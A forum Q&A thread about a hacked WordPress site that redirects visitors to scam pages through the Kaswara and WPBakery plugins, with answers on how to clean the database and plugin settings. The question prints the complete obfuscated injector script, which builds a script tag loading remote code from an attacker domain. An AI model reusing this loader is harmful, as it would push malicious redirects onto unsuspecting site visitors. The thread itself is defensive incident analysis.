I have come accross the issue that one of the WordPress websites I provide maintenance for would strangely redirect the user (unprotected by an AdBlocker) to scam websites.
The redirection has been done through stick.travelinskydream.ga.
On a closer check, a script with the following code has been automatically injected into the application. The following code was used:
var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);
It creates a script tag that executes an external JS code which redirects the user to malicious websites when it loads. The resulted script looks like:
<script src="https://stick.travelinskydreams.ga?Brand.js?vid=0000&pidi=191817&id=53646"></script>
From what I’ve seen, thie vulnerability exists within WpBakery and Kaswara plugins and is a known issue.
https://howtofix.guide/fake-jquery-migrate-plugin/
After deactivating and reactivating plugins one by one, the only two culprits remained js_composer (Wp Bakery) and Kaswara. I have tried updating these two plugins, but the "infection" remained, even though patches have been released for this issue.
6
Answers
The resolution was simple enough: after hours, inside Wordpress Dashboard, in the Kaswara menu > custom code sections, the very code that has been presented in the question was there. After deleting it, everything returned to normal.
It is surely not the only way such malware can destroy work, so I am appending this link with other possible effects.
https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/
A potential workaround that worked for me was adding this custom script that would remove the malicious JS after it has loaded (temporary solution, does not remove the virus):
Here is the "beautified" malicious code of the injected JS, maybe it will help someone.
If you find anything else or have been affected by this, please share your solutions!
Just found this option with a BASE64 encoded JS Script. Find and delete it.
Look for this entrie on you WP_OPTIONS table
Whats happenning here?
This malware is a Javascript content witch triggers the GET travelinski stuff brand.js.
It’s content is encoded in BASE64 to disrupt its detection by SH or Select Query. When invoked into the screen it become a executable snippet.
It may appear under different an option_name, but the content itself must not change that much.
So anyone looking for this issue, here is the reason and the solution.
Reason
Plugins: WP-Bakery (JS Composer) and Kaswara Plugins are having this issue.
Solution
You need to remove one entry from your wp_options table.
After you clean your site removing the extrajs in kaswara and perform a full scan with wordfence then:
For every wordfence freemium users who tries to fix this issue before the 21st May I suggest to:
In the wordfence-waf.php put these line just one line after the <?php tag:
Then when you receive the wordfence update on 21st May revert back as the original
Thank you very much for this. I had my website infected with this and after restoring from backup, only to see if reinfected 2 weeks later. Found the db entry and also saw the script in the custom settings of kaswara. I’ll see how best I can substitute what I used it for and then delete it.
Any idea how they got in? Is there an htaccess directive I can add to block them?
I found this report and went digging and found a p.php file uploaded 8 days ago in the kaswara icons folder /uploads/kaswara/icon/slt
https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5
After removing the kaswara plugin, go to mysql maybe via phpmyadmin,
find the wp_options table and delete kasvaracustomjs option_name